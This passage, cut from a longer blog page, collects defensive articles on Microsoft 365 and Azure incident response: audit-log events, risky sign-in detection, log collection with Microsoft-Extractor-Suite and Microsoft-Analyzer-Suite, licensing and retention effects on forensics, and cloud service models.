String searches: Tools like bulk_extractor and YARA can search hard drives and memory for residual traces of configuration files or rclone-related artifacts, helping to uncover more about the attackers' activities. Regexes can be combined to search for both Mega and rclone traces at once.

In some cases, investigators can even use these methods to track down the attackers' infrastructure and work with law enforcement to take further action. Cloud providers often have detailed logs showing when the data was uploaded, whether it was downloaded again, and from where.

-------------------------------------------------------------------------

Conclusion

As attackers increasingly leverage cloud services to exfiltrate stolen data, organizations need to adapt their incident response strategies accordingly. Understanding how attackers use tools like rclone and MegaSync can help defenders detect exfiltration attempts faster and take steps to mitigate the damage. By carefully analyzing forensic artifacts like MountPoints, Shellbags, and volume snapshots, investigators can reconstruct attacker activities and gain insight into the extent of the breach.

Akash Patel

  • Microsoft 365 Security: Understanding Built-in Detection Mechanisms and Investigating Log Events

    As the landscape of cybersecurity threats evolves, protecting sensitive information stored within enterprise platforms like Microsoft 365 (M365) has become a top priority for IT and security teams. To help organizations identify and mitigate these risks, Microsoft provides a range of built-in detection mechanisms based on user activity and sign-in behavior analysis. While these tools can offer significant insights, it's important to understand their limitations, potential false positives, and how to effectively investigate suspicious events.

-------------------------------------------------------------------------

Built-In Reports: Monitoring Risky Activity

Microsoft 365's built-in reporting suite provides several out-of-the-box detection features that monitor risky user behavior and sign-in activity. These include:

Risky sign-ins: Sign-ins flagged as risky due to factors like unusual IP addresses, impossible travel, or logins from unfamiliar devices.
Risky users: User accounts exhibiting abnormal behavior, such as frequent failed login attempts or multiple sign-ins from different geographies.
Risk detections: A general term referring to any identified behavior or event that deviates from normal patterns and triggers a system alert.

These alerts are largely powered by machine learning and heuristic algorithms that analyze stored log data to identify abnormal behavior patterns. The system is designed to recognize potential security risks, but it does have some caveats.

-------------------------------------------------------------------------

Built-In Risk Detection: Delays and False Positives

One of the most important things to understand about Microsoft's risk detection mechanisms is that they are not instantaneous. Alerts can take up to 8 hours to be generated, meaning there is a delay between the detection of a suspicious event and the time it takes for the alert to surface. This delay is designed to allow the system to analyze events over time and avoid triggering unnecessary alerts, but it also means that organizations may not be alerted to security incidents immediately.

Another challenge is that these alerts can sometimes generate false positives. A common example is the geolocation module and its associated "impossible travel" alert. This is triggered when a user signs in from two geographically distant locations within a short time, which would be impossible under normal circumstances. However, the issue often arises from incorrect IP location data, such as when users connect to the internet via hotel networks, airplane Wi-Fi, or mobile carriers. For instance, if a user switches from airplane internet to airport Wi-Fi, the system may mistakenly flag it as an impossible travel scenario, even though the user hasn't changed locations.

Managing False Positives

Because these false positives can clutter security dashboards, it's important for IT teams to review and refine their alerting thresholds. Regular tuning of the system and awareness of typical user behaviors—such as frequent travelers—can help minimize the noise created by these alerts and focus on genuine threats.

-------------------------------------------------------------------------

Investigating and Profiling Logons

When a suspicious event is detected, one of the first steps in investigating the issue is analyzing logon data.
Microsoft's Unified Audit Log (UAL) tracks over 100 types of events, including both successful and unsuccessful login attempts. Here are some key strategies for analyzing logons and identifying potential security breaches:

Tracking Successful Logins

Every successful login generates a UserLoggedIn event, which includes valuable information such as the source IP address. Investigators can use this data to identify unusual logon behavior, such as logins from unexpected geographical locations or at unexpected times. Temporal or geographic outliers—such as a login from a country the user has never visited—can be red flags that warrant further investigation. Additionally, a pattern of failed logon attempts (logged as UserLoginFailed events) followed by a successful login from a different or suspicious IP address may suggest that an attacker was trying to brute-force or guess the user's password before successfully logging in.

Investigating Brute-Force Attacks

Brute-force attacks—where an attacker attempts to gain access by repeatedly guessing the user's credentials—leave distinctive traces in the log data. One common sign of a brute-force attack is a user getting locked out of their account after multiple failed login attempts. In this case, you would see a sequence of UserLoginFailed events followed by an "IdsLocked" event, indicating that the account was temporarily disabled due to too many failed attempts. Further, even if the user account doesn't exist, the system will log the attempt with UserKey="Not Available", which can help identify instances of user enumeration—a technique used by attackers to discover valid usernames by testing different variations.

-------------------------------------------------------------------------

Investigating MFA-Related Events

When multi-factor authentication (MFA) is enabled, additional events are logged during the authentication process. For example:

UserStrongAuthClientAuthNRequired: Logged when a user successfully enters their username and password but is then prompted to complete MFA.
UserStrongAuthClientAuthNRequiredInterrupt: Logged if the user cancels the login attempt after being asked for the MFA token.

These events are particularly useful in detecting attempts by attackers to bypass MFA. If you notice a sudden increase in UserStrongAuthClientAuthNRequiredInterrupt events, it could indicate that attackers have obtained passwords from a compromised database and are testing accounts to find those without MFA enabled.

-------------------------------------------------------------------------

Investigating Mailbox Access and Delegation

Attackers who gain access to a Microsoft 365 environment often target email accounts, particularly those of key personnel. Once inside, they may attempt to read emails or set up forwarding rules to siphon off sensitive information. One tactic is to use delegate access, where one account is granted permission to access another user's mailbox. Delegate access is logged in the UAL, and reviewing these logs can reveal when permissions are assigned or when a delegated mailbox is accessed. In addition, organizations should regularly audit their user lists to check for unauthorized accounts that may have been created by attackers. In many cases, such unauthorized users are only discovered during license reviews.
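The logon, MFA, and mailbox events described above can all be pulled from the UAL with the Search-UnifiedAuditLog cmdlet from the ExchangeOnlineManagement module. A minimal sketch (the user address and date range are illustrative):

Connect-ExchangeOnline

# Pull a week of logon-related events for one user
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-7) -EndDate (Get-Date) `
    -UserIds "jane.doe@example.com" `
    -Operations UserLoggedIn,UserLoginFailed,UserStrongAuthClientAuthNRequiredInterrupt `
    -ResultSize 5000 |
    Select-Object CreationDate, Operations, UserIds, AuditData |
    Export-Csv .\logon-events.csv -NoTypeInformation

The AuditData column holds the JSON payload with the source IP address and other details used for the outlier analysis described above.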
Another avenue for attackers is server-side forwarding, which can be set up through either a Transport Rule or an Inbox Rule. These forwarding mechanisms can be used to exfiltrate data, so security teams should regularly review the organization's forwarding rules to ensure no unauthorized forwarding is taking place.

-------------------------------------------------------------------------

External Applications and Consent Monitoring

Microsoft 365 users can grant third-party applications access to their accounts, which poses a potential security risk. Once access is granted, the application doesn't need further permission to interact with the account. Monitoring for the "Consent to application" event can help organizations detect when external applications are being granted access, particularly if the organization doesn't typically use external apps. This was a factor in the well-documented SANS breach in 2020, where attackers exploited third-party app permissions to gain access to a user's mailbox. https://www.sans.org/blog/sans-data-incident-2020-indicators-of-compromise/

-------------------------------------------------------------------------

Conclusion

While Microsoft 365 offers powerful built-in tools for detecting risky behavior and investigating suspicious logon events, security teams must be aware of their limitations, particularly the potential for false positives and delayed alerts. By regularly reviewing log data, investigating unusual patterns, and keeping an eye on key events like failed login attempts, MFA interruptions, and delegation changes, organizations can better protect their environments against evolving threats. The key to effective security monitoring is a proactive approach, combining automated detection with human analysis to sift through the noise and focus on genuine risks.

Akash Patel

  • Streamlining Cloud Log Analysis with Free Tools: Microsoft-Extractor-Suite and Microsoft-Analyzer-Suite

    When it comes to investigating cloud environments, having the right tools can save a lot of time and effort. Today, I'll introduce two free, powerful tools that are absolutely fantastic for log analysis within the Microsoft cloud ecosystem: Microsoft-Extractor-Suite and Microsoft-Analyzer-Suite. These tools are easy to use, flexible, and can produce output in accessible formats like CSV and Excel, making them excellent resources for investigating business email compromises, cloud environment audits, and more.

About Microsoft-Extractor-Suite

The Microsoft-Extractor-Suite is an actively maintained PowerShell tool designed to streamline data collection from Microsoft environments, including Microsoft 365 and Azure. This toolkit provides a convenient way to gather logs and other key information for forensic analysis and cybersecurity investigations.

Supported Microsoft Data Sources

Microsoft-Extractor-Suite can pull data from numerous sources, including:

Unified Audit Log
Admin Audit Log
Mailbox Audit Log
Azure AD Sign-In Logs
Azure Activity Logs
Conditional Access Policies
MFA Status for Users
Registered OAuth Applications

This range allows investigators to get a comprehensive picture of what's happening across an organization's cloud resources.

-------------------------------------------------------------------------

Installation and Setup

To get started, you'll need to install the tool and its dependencies. Here's a step-by-step guide:

Install Microsoft-Extractor-Suite:
Install-Module -Name Microsoft-Extractor-Suite

Install the Microsoft.Graph PowerShell module (for Graph API Beta functionality):
Install-Module -Name Microsoft.Graph

Install ExchangeOnlineManagement (for Microsoft 365 functionality):
Install-Module -Name ExchangeOnlineManagement

Install the Az module (for Azure Activity log functionality):
Install-Module -Name Az

Install the AzureADPreview module (for Azure Active Directory functionality):
Install-Module -Name AzureADPreview

Once the modules are installed, you can import them using:
Import-Module .\Microsoft-Extractor-Suite.psd1

-------------------------------------------------------------------------

Note: You will need to sign in to Microsoft 365 or Azure with appropriate permissions (admin-level access, a P1 or higher license, or an E3/E5 license) before using Microsoft-Extractor-Suite functions.

-------------------------------------------------------------------------

Getting Started

First, connect to your Microsoft 365 and Azure environments:

Connect-M365
Connect-Azure
Connect-AzureAZ

From here, you can specify start and end dates, user details, and other parameters to narrow down which logs to collect. The tool captures output in Excel format by default, stored in a designated output folder.

Link: https://microsoft-365-extractor-suite.readthedocs.io/en/latest/

-------------------------------------------------------------------------

Example of logs I collected:

One drawback to keep in mind is that logs are collected one at a time; for example, you first collect the MFA logs, then run another command to collect the user logs. Another thing to keep in mind is that if you do not provide a path, the output will be captured in the default folder where the script is located.
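If you only need a subset of the data, most collection functions accept scoping parameters. A rough sketch for the Unified Audit Log follows; the parameter names follow the project's documentation linked above and may differ between versions, so check Get-Help Get-UALAll in your install, and the user, dates, and path are illustrative:

Connect-M365

# Collect UAL entries for one user over a defined window into a case folder
Get-UALAll -UserIds "jane.doe@example.com" -StartDate "2024-01-01" -EndDate "2024-01-31" -OutputDir "C:\Cases\Case01\UAL"

Scoping the collection this way keeps the number of output files manageable and speeds up the analysis step later on.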
-------------------------------------------------------------------------

You might wonder why there are two different suites. The answer is that there is a second project, Microsoft-Analyzer-Suite, developed by evild3ad. This suite offers a collection of PowerShell scripts specifically designed for analyzing Microsoft 365 and Microsoft Entra ID data that has been extracted with Microsoft-Extractor-Suite. The list of analyses currently supported by Microsoft-Analyzer-Suite is on its project page.

Link: https://github.com/evild3ad/Microsoft-Analyzer-Suite

-------------------------------------------------------------------------

Before I start, here is the folder structure of both tools: Microsoft-Extractor-Suite and Microsoft-Analyzer-Suite-main. The Analyzer Suite also lets you add specific IP addresses, ASNs, or applications to a whitelist by editing the whitelist folder in the Microsoft-Analyzer-Suite directory.

-------------------------------------------------------------------------

Let's start. I will show two logs being captured and analyzed: the Message Trace log and the Unified Audit Log, both collected using Microsoft-Extractor-Suite and then analyzed with Microsoft-Analyzer-Suite.

Collecting Logs with Microsoft-Extractor-Suite

Now, let's go over collecting logs. Here's an example command to retrieve the Unified Audit Log entries for the past 90 days for all users:

Get-UALAll

After running this, the tool will output data in Excel format to a default folder. However, you may need to combine the multiple output files into one .csv file, because the Analyzer Suite scripts only accept .csv input.

-------------------------------------------------------------------------

Combining CSV Files into One Excel File

When working with large data sets, it's more efficient to combine multiple log files into a single file. Here's how to do this in Excel:

Place all relevant CSV files in a single folder.
Open a new Excel spreadsheet and navigate to Data > Get Data > From File > From Folder.
Select the folder containing your CSV files and click "Open".
From the Combine drop-down, choose Combine & Transform Data. This option loads your files into the Power Query Editor, where you can manipulate and arrange the data.
In the Power Query Editor, click OK to load your combined data.
Edit any column formats, apply filters, or sort the data as needed.
Once done, go to Home > Close & Load.

To ensure compatibility with Microsoft-Analyzer-Suite, save the resulting file as a .csv.

Using Microsoft-Analyzer-Suite for Log Analysis

With your data collected and organized, it's time to analyze it with Microsoft-Analyzer-Suite.

UAL-Analyzer.ps1

Before using the UAL-Analyzer.ps1 script, there are a few dependencies you need to have installed:

An IPinfo account (it's free): https://ipinfo.io/signup?ref=cli
ImportExcel for Excel file handling (PowerShell module): Install-Module -Name ImportExcel (https://github.com/dfinke/ImportExcel)
IPinfo CLI (standalone binary): https://github.com/ipinfo/cli
xsv (standalone binary): https://github.com/BurntSushi/xsv

To install xsv: since I had WSL available, I used git clone https://github.com/BurntSushi/xsv.git; you can also simply download the folder, whichever you prefer.

Once the dependencies are set up, configure your IPinfo token by pasting it into the UAL-Analyzer script. To locate this in the script, open UAL-Analyzer.ps1 with a text editor like Notepad++, search for the token variable, and paste your token there.
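If you prefer to skip Excel entirely, the same merge can be done in a couple of lines of PowerShell (paths are illustrative):

# Merge every CSV produced by the extractor into a single file for the Analyzer Suite
Get-ChildItem "C:\Cases\Case01\UAL" -Filter *.csv |
    ForEach-Object { Import-Csv $_.FullName } |
    Export-Csv "C:\Cases\Case01\CombinedUALLog.csv" -NoTypeInformation

This assumes all of the per-interval files share the same column layout, which is the case for output coming from a single extractor function.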
Running the Analysis Script For Unified Audit Logs, use the UAL-Analyzer script. For example: .\UAL-Analyzer.ps1 "C:\Path\To\Your\CombinedUALLog.csv" -output "C:\Path\To\Output\" Once the script has run successfully and the output has been collected, you will get a pop-up. ------------------------------------------------------------------------------------------------------------ Let’s check the output: As per the screenshot, you can see the output is produced in both CSV and XLSX format. Why the same output in two formats? Because the XLSX file is colour-coded: if something suspicious is found, it is highlighted automatically, whereas the CSV contains the same data without any highlighting. Example of XLSX: Example of CSV: Folder Suspicious Operation: A kind note: the scripts are still being updated and modified, so if you check GitHub you might find a newer version that works even better. The current version produced this output for me and made things easy; I hope it does the same for you. ------------------------------------------------------------------------------------------------------------ The second log we are going to talk about is the Message Trace log. Command (this will collect all logs): Get-MessageTraceLog Screenshot of output: The next step is to combine all of the output files into one .csv file. Once done, run the MTL-Analyzer script: .\MTL-Analyzer.ps1 "C:\Path\To\Your\CombinedMTLLog.csv" -output "C:\Path\To\Output\" (Make sure you add your IPinfo token details inside the script before running it.) Conclusion By combining Microsoft-Extractor-Suite and Microsoft-Analyzer-Suite, you can effectively streamline log collection and analysis across Microsoft 365 and Azure environments. While each suite has its own focus, together they provide an invaluable resource for incident response and cybersecurity. Now that you have the steps, you can test and run the process on your own logs. I hope this guide makes things easier for you! See you, and take care! Akash Patel

  • Streamlining Office/Microsoft 365 Log Acquisition: Tools, Scripts, and Best Practices

    When conducting investigations, having access to Unified Audit Logs (UALs) from Microsoft 365 (M365) environments is crucial. These logs help investigators trace activities within an organization, covering everything from user login attempts to changes made in Azure Active Directory (AD) and Exchange Online. There are two primary ways for investigators to search and filter through UALs: Via the Microsoft 365 web interface for basic investigation. Using ready-made script frameworks to automate data acquisition and conduct more in-depth, offline analysis. While the M365 interface is helpful for small-scale operations, using PowerShell scripts or specialized tools can save a lot of time in larger investigations. This article will walk you through the process of acquiring Office 365 logs, setting up acquisition accounts, and leveraging open-source tools to make investigations more efficient. --------------------------------------------------------------------------------------------------------- Setting Up a User Account for Log Acquisition To extract logs for analysis, you need to set up a special user account in M365 with specific permissions that provide access to both Azure AD and Exchange-related information. This process requires setting up roles in both the Microsoft 365 Admin Center and the Exchange Admin Center. Step 1: Create an Acquisition Account in M365 Admin Center Go to the M365 Admin Center. Create a new user account. Assign the Global Reader role to the account. This role grants access to Unified Audit Logs (UALs). Step 2: Set Up Exchange Permissions Next, you’ll need to set up permissions in the Exchange Admin Center: Go to the Exchange Admin Center and create a new group. Assign the Audit Log permission to the group. This role allows access to audit logs for Exchange activities. Add the user you created in the M365 Admin Center to this group. Now that the account has the necessary permissions, you are ready to acquire logs from Microsoft 365 for your investigation. Note: If it becomes possible in the future, I will create a detailed blog on how to set up the account and collect the logs manually. --------------------------------------------------------------------------------------------------------- Automation: Using Ready-Made Acquisition Scripts Several pre-built scripts make the process of acquiring Unified Audit Logs (UALs) and other cloud-based logs easier, especially when conducting large-scale investigations. Below are two of the most widely used frameworks: 1. DFIR-O365RC (Developed by ANSSI) DFIR-O365RC is a powerful PowerShell-based tool developed by ANSSI, the French governmental Cyber Security Agency. This tool is designed to extract UAL data and integrate with Azure APIs to provide a more comprehensive view of the data. Key Features: Access to both UAL and multiple Azure APIs, allowing for more enriched data acquisition. The tool is somewhat complex, but the GitHub page provides guidance on setup and usage. Usage: Once you set up the Global Reader account and Audit Log permissions, you can use DFIR-O365RC to automate the extraction of logs. The tool provides a holistic view of available data, including enriched details from Azure AD and Exchange. Reference: DFIR-O365RC GitHub Page 2. Office-365-Extractor (Developed by PwC Incident Response Team) Another useful tool is Office-365-Extractor, developed by PwC’s incident response team.
This tool includes functional filters that let investigators fine-tune their extraction depending on the type of investigation they are running. Key Features: Functional filters for tailoring data extraction to specific investigation needs. Complements PwC’s Business Email Compromise (BEC) investigation guide, which offers detailed instructions on analyzing email compromises in Office 365 environments. Usage: Investigators can quickly set up the tool and begin filtering logs by specific criteria like user activity, mailbox access, or login attempts. Reference: Office-365-Extractor GitHub Page Business Email Compromise Guide Both DFIR-O365RC and Office-365-Extractor provide a more streamlined approach for handling larger volumes of data, making it easier to manage in-depth investigations without running into the limitations of the Microsoft UI. --------------------------------------------------------------------------------------------------------- The Tool I Prefer: Microsoft Extractor Suite, Another Cloud-Based Log Acquisition Tool In addition to the tools mentioned above, there is another robust tool known as the Microsoft Extractor Suite. It is considered one of the best options for cloud-based log analysis and acquisition. Though we won’t dive into full details in this article, it’s worth noting that this tool is highly recommended for investigators dealing with larger or more complex environments. --------------------------------------------------------------------------------------------------------- Why Automated Tools Are Crucial for Large-Scale Investigations While the M365 UI is convenient for smaller investigations, its limitations become apparent during large-scale data acquisitions. Automated scripts not only save time but also allow for more thorough and efficient data collection. These tools can help investigators get around the API export limitations, ensuring that no critical data is missed. Additionally, data science methodologies can be applied to the collected logs to uncover patterns, trends, or anomalies that might otherwise go unnoticed in manual analysis. As cloud-based environments continue to grow in complexity, leveraging these automation frameworks becomes increasingly essential for effective incident response. --------------------------------------------------------------------------------------------------------- Final Thoughts and Next Steps In conclusion, the combination of Microsoft 365 Admin Center, Exchange Admin Center, and automated tools like DFIR-O365RC and Office-365-Extractor provides investigators with a powerful framework for extracting and analyzing Office 365 logs. Setting up the right user accounts with appropriate roles is the first step, followed by leveraging these scripts to automate the process, ensuring no data is overlooked. Stay tuned for a detailed guide on the Microsoft Extractor Suite, which we’ll cover in an upcoming blog post. Until then, happy investigating! Akash Patel

  • M365 Logging: A Guide for Incident Responders

    When it comes to Software as a Service (SaaS), defenders heavily rely on the logs and information provided by the vendor. For Microsoft 365 (M365), the logging capabilities are robust, often exceeding what incident responders typically find in on-premises environments. At the heart of M365’s logging system is the Unified Audit Log (UAL), which captures over 100 different activities across most of the SaaS products. What You Get: Logs and Retention Periods The type of logs you have access to, and their retention periods, depend on your M365 licensing. While there are options to extend retention by offloading data periodically, obtaining the detailed logs available with higher-tier licenses can be challenging with less expensive options. Another consideration is the limitations Microsoft places on API quotas for offloading and offline analysis. However, there are ways to navigate these restrictions effectively. Log Retention Table: (Microsoft keeps updating it, so keep an eye on the official Microsoft documentation) Key Logs in M365 Azure AD Sign-in Logs: Most Microsoft services now use Azure Active Directory (AD) for authentication. In this context, the Azure AD Sign-in logs can be compared to the 4624 and 4625 event logs in on-premises domain controllers. A unique aspect of these logs is that most authentication requests originate from the internet through publicly exposed services. This allows for additional detection methods based on geolocation data. The information gathered here is also ideal for time-based pattern analysis, enabling defenders to track unusual login behaviors. Unified Audit Log (UAL): The UAL is a treasure trove of activity data available to all paid enterprise licenses. The level of detail varies by licensing tier, and Microsoft occasionally updates what each package includes. Unlike typical Windows logs, where a significant percentage may be irrelevant to incident response, the UAL is designed for investigations, with almost all logged events being useful for tracing activities. Investigation Categories To help incident responders leverage the UAL effectively, we categorize investigations into three types: User-based, Group-based, and Application-based investigations. Each category will include common scenarios and relevant search terms. 1. User-Based Investigations These investigations focus on user objects within Azure AD. Key activities include: Tracking User Changes: Understand what updates have been made to user profiles, including privilege changes and password resets. Auditing Admin Actions: Log any administrative actions taken in the directory, which is crucial for accountability. Typical Questions: What types of updates have been applied to users? How many users were changed recently? How many passwords have been reset? What actions have administrators performed in the directory? 2. Group-Based Investigations Group-based investigations are closely related to user investigations since permissions in Azure AD often hinge on group memberships. Monitoring groups is vital for security. Group Monitoring: Track newly added groups and any changes in memberships, especially for high-privilege groups. Typical Questions: What new groups have been created? Are there any groups with recent membership changes? Have the owners of critical groups been altered?
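Many of the user- and group-focused questions above can be answered directly from the UAL with the Search-UnifiedAuditLog cmdlet in the ExchangeOnlineManagement module. The following is a minimal sketch; the operation names shown are common Azure AD audit operations, but they change over time and vary by tenant, so treat them as assumptions and confirm the exact values in your own audit data.

# Hedged sketch: pull recent user and group changes from the Unified Audit Log
Connect-ExchangeOnline
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-7) -EndDate (Get-Date) `
    -Operations "Update user.","Reset user password.","Add member to group." `
    -ResultSize 5000 |
    Select-Object CreationDate, UserIds, Operations, AuditData

The AuditData column holds the full JSON record for each event, which is where the detailed who, what, and when values live.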
3. Application-Based Investigations Application logs can vary significantly depending on the services in use. One critical area to investigate is application consent, which can highlight potential breaches if an attacker gains access through an Azure application. Typical Questions: What applications have been added or updated recently? Which applications have been removed? Has there been any change to a service principal for an application? Who has given consent to a particular application? 4. Azure AD Provision Logs Azure AD Provision logs are generated when integrating third-party services like ServiceNow or Workday with Azure AD. These services often facilitate employee-related workflows that need to connect with the user database. Workflow Monitoring: For instance, during employee onboarding in Workday, the integration may involve creating user accounts and assigning them to appropriate groups, all of which are logged in Azure AD Provision logs. Typical Questions: What groups have been created in ServiceNow? Which users were successfully removed from Adobe? What users from Workday were added to Active Directory? Leveraging Microsoft Defender for Cloud Apps The Microsoft Defender for Cloud Apps can be an invaluable tool during investigations, provided it is correctly integrated with your cloud applications. By accessing usage data, defenders can filter out certain user agents and narrow down the actions of an attacker. For more information, refer to Microsoft Defender for Cloud Apps Announcement. Conclusion Understanding and effectively utilizing the logging capabilities of M365, particularly the Unified Audit Log and other related logs, can significantly enhance your incident response efforts. By focusing on user, group, and application activities, defenders can gain valuable insights into potential security incidents and make informed decisions to bolster their security posture. Akash Patel

  • Microsoft Cloud Services: Focus on Microsoft 365 and Azure

    Cloud Providers in Focus: Microsoft and Amazon In today’s cloud market, Microsoft and Amazon are the two biggest players, with each offering a variety of services. Microsoft provides solutions across all three categories—Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS) . Amazon, on the other hand, focuses heavily on IaaS and PaaS, with limited SaaS offerings . For investigative purposes, the focus with Amazon is usually on IaaS and PaaS components, while Microsoft’s extensive suite of cloud services demands a closer look into Microsoft 365 (M365) and Azure. Microsoft 365 (M365): A Successor to Office 365 Microsoft 365, previously known as Office 365, is a comprehensive cloud-based suite that offers both SaaS and on-premises tools to businesses. Licensing within Microsoft 365 can get quite complicated, especially when viewed from a security and forensics perspective. The impact of licensing on forensic investigations is significant, as it determines the extent of data and log access. Understanding M365 Licensing M365 licenses range from Business Basic  to Business Premium , with Enterprise tiers referred to as E1, E3, and E5 : Business Basic : Provides cloud access to Exchange, Teams, SharePoint, and OneDrive. Business Standard : Adds access to downloadable Office apps (Word, Excel, etc.) and web-based versions. Business Premium : Adds advanced features like Intune for device management and Microsoft Defender. Enterprise licenses offer more advanced security features, with E3 and E5  providing the highest level of access to security logs and forensic data. In forensic investigations, having access to these higher-tier licenses is essential for capturing a comprehensive view of the environment. Impact on Forensics In an M365 environment, licensing plays a crucial role in how effectively investigators can respond to breaches. In traditional on-premises setups, investigators had access to physical machines for analysis, regardless of license level. However, in cloud settings, access to vital data is often gated by licensing, making high-tier licenses, such as E3 and E5 , invaluable for thorough investigations. Azure: Microsoft’s IaaS with a Hybrid Twist Azure, Microsoft’s IaaS solution, includes PaaS and SaaS components like Azure App Services and Azure Active Directory (Azure AD). It provides customers with virtualized data centers, complete with networking, backup, and security capabilities . The IaaS aspect allows customers to control virtual machines directly, enabling traditional forensic processes such as imaging, memory analysis, and the installation of specialized forensic tools. Azure Active Directory (Azure AD) and Hybrid Setups Azure AD, a critical component for many organizations, provides identity and access management across Microsoft’s cloud services . In hybrid environments, Azure AD integrates with on-premises Active Directory (AD) to support cloud-based services like Exchange Online, ensuring seamless authentication across on-prem and cloud environments. This integration introduces Azure AD Connect , which synchronizes data between on-prem AD and Azure AD. As a result, administrators can manage both environments from Azure, but this also increases exposure to the internet. Unauthorized access to Azure AD credentials could compromise the entire environment, which highlights the need for Multi-Factor Authentication (MFA) . 
Key Considerations for Azure AD Connect Azure AD Connect is integral for organizations using both on-prem and cloud-based Active Directory. It relies on three key accounts, each with specific permissions to enhance security and maintain synchronization: AD DS Connector Account : Reads and writes data to and from the on-premises AD. ADSync Service Account : Syncs this data into a SQL database, serving as an intermediary. Azure AD Connector Account : Syncs the SQL database with Azure AD, allowing Azure AD to reflect updates from on-prem AD. These roles are critical for secure synchronization, ensuring that changes in on-premises AD are accurately mirrored in Azure AD. This dual setup requires investigators to examine both infrastructures during an investigation, increasing the complexity of the forensic process. The Role of MFA and Security Risks in Hybrid Environments In hybrid setups, users are accustomed to entering domain credentials on cloud-based platforms, making them vulnerable to phishing attacks. MFA plays a vital role in preventing unauthorized access but is not foolproof. Skilled attackers can bypass MFA through various techniques, such as phishing  or SIM swapping , underlining the need for a layered security approach. Microsoft’s Licensing Complexity and Forensics Microsoft’s licensing structure is notorious for its complexity, and this extends to M365. While on-premises systems allowed investigators full access to data regardless of licensing, the cloud imposes limits based on the chosen license tier. This means that E3 and E5 licenses  are often necessary for investigators to access the full scope of data logs and security features needed for in-depth analysis. In hybrid environments, these licensing considerations directly impact the data available for forensics. For example, lower-tier licenses may provide limited audit logs, while E5 licenses include advanced logging and alerting features that can make a significant difference in detecting and responding to breaches. Investigative Insights and Final Thoughts For investigators, Microsoft’s cloud services introduce new layers of complexity: Dual Authentication Infrastructures : Hybrid setups mean you’ll need to investigate both on-prem and cloud-based AD systems. MFA Requirements : Securing Azure AD with MFA is crucial, but investigators must be aware of MFA’s limitations and potential bypass methods. High-Tier Licenses for Forensic Access : E3 and E5 licenses unlock advanced security and audit logs that are vital for thorough investigations. In summary, Microsoft 365 and Azure provide powerful tools for businesses but introduce additional challenges for forensic investigators. By understanding the role of licensing, Azure AD synchronization, and MFA, organizations can better prepare for and respond to incidents in their cloud environments. These considerations ensure that forensic investigators have the access they need to effectively secure, investigate, and manage cloud-based infrastructure. Akash Patel

  • Forensic Challenges of Cloud-Based Investigations in Large Organizations

    Introduction: Cloud-Based Infrastructure and Its Forensic Challenges Large-scale investigations have a wide array of challenges. One that’s increasingly common is navigating the cloud-based infrastructure of large organizations. As more businesses integrate cloud services with on-premises systems like Microsoft Active Directory, attackers can easily move between cloud and on-premises environments—an investigator’s nightmare! Cloud platforms are tightly woven into corporate IT, yet they bring unique considerations for incident response and forensic investigations. A key point to remember is that cloud infrastructure essentially boils down to “someone else’s computer.” And unfortunately, that “someone else” may not be ready to grant you full forensic access when a breach occurs. To get into the nitty-gritty of cloud forensics, it’s essential to understand the different types of cloud offerings: Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS). Each of these comes with unique access levels and data availability, impacting how effectively we can conduct investigations. Diving Into Cloud Services: IaaS, PaaS, and SaaS Let’s break down these cloud service types to see how they affect access to forensic data. 1. Infrastructure as a Service (IaaS) What It Is: In IaaS, cloud providers offer virtual computing resources over the internet. You get to spin up virtual machines and networks, almost like your own data center, except it’s hosted by the provider. Forensic Access: Since customers manage their own operating systems and applications, IaaS provides the most forensic access among cloud service types. Investigators can perform standard incident response techniques, like log analysis and memory captures, much as they would on on-prem systems. Challenges: The major challenge is the dependency on the provider. Moving away from a provider you’ve invested in heavily can be a headache. So, it’s essential to plan security and forensic readiness from the start. 2. Platform as a Service (PaaS) What It Is: PaaS bundles the OS with essential software, such as application servers, allowing you to deploy applications without worrying about the underlying infrastructure. Forensic Access: This setup limits access to the underlying OS, which restricts what investigators can directly analyze. You can access logs and some application data, but full system access is typically off-limits. Challenges: Because multiple customers often share the infrastructure, in-depth forensics might reveal data belonging to other clients. Therefore, cloud providers rarely allow forensic access to the physical machines in a PaaS setup. 3. Software as a Service (SaaS) What It Is: SaaS handles everything from the OS up, so the customer only interacts with the software. Forensic Access: Forensics in a SaaS environment is usually limited to logs, often determined by the service tier (and subscription cost). If a backend compromise occurs, SaaS logs might not give enough data to identify the root cause. Challenges: This limitation can cause breaches to go unnoticed for extended periods. SaaS providers control everything, so investigators can only work with whatever logs or data the provider makes available. Cloud-Based Forensics vs. Traditional On-Premises Forensics With traditional on-premises forensics, investigators have deep access to various system components.
They can use techniques like creating super timelines to correlate events across systems, uncovering hidden evidence . Cloud forensics, however, is a different story. Cloud investigations resemble working with Security Information and Event Management (SIEM) systems in Security Operations Centers (SOCs). Just as SIEM setups depend on pre-selected data inputs, cloud providers offer only certain types of logs and data. This means you need to plan ahead to ensure you’re capturing the right logs. When it’s time to investigate, you’ll be limited to whatever was logged based on the initial setup and your subscription level. Essential Steps for Incident Response in the Cloud Handling incidents in the cloud follows many of the same steps as traditional response processes, but there’s an added emphasis on preparation. Without the right preparations, investigators could be left scrambling, unable to detect or respond to intrusions effectively. Preparation : Know Your Environment : Document the systems your organization uses, along with any defenses and potential weak spots. Prepare for likely incidents based on your cloud architecture and assets. Logging : Make sure you’re subscribed to an adequate logging tier to capture the necessary data for investigations. Higher-tier subscriptions often provide more granular logs, which are crucial for in-depth analysis. Data Retention : Cloud providers offer different retention periods depending on the subscription. Ensure the data you need is available long enough for proper analysis. Detection : Use tools like the MITRE ATT&CK® framework to identify techniques and indicators of compromise specific to cloud environments. Regularly review security logs to detect anomalous activities. Log aggregators and monitoring tools can streamline this process. Analysis : For IaaS, you can perform traditional forensic techniques, such as memory analysis and file recovery. For PaaS and SaaS, focus on analyzing available logs. If suspicious activity is detected, collect and analyze whatever data the provider can provide. Correlate cloud logs with on-premises logs to trace attacker movements between environments. Containment & Eradication : In the cloud, containment often involves disabling specific accounts or access keys, updating permissions, or isolating compromised systems. For SaaS or PaaS, the provider might handle containment on their end, so you’ll need a strong partnership with your provider to act quickly in a breach. Recovery : Implement any necessary changes to strengthen security and avoid re-compromise. This may involve changing access policies, adjusting logging settings, or reconfiguring cloud resources. Lessons Learned : Post-incident, review what happened and how it was handled. Look for opportunities to enhance your response capabilities and bolster your cloud security posture. Leveraging the MITRE ATT&CK Framework for Cloud Environments The MITRE ATT&CK 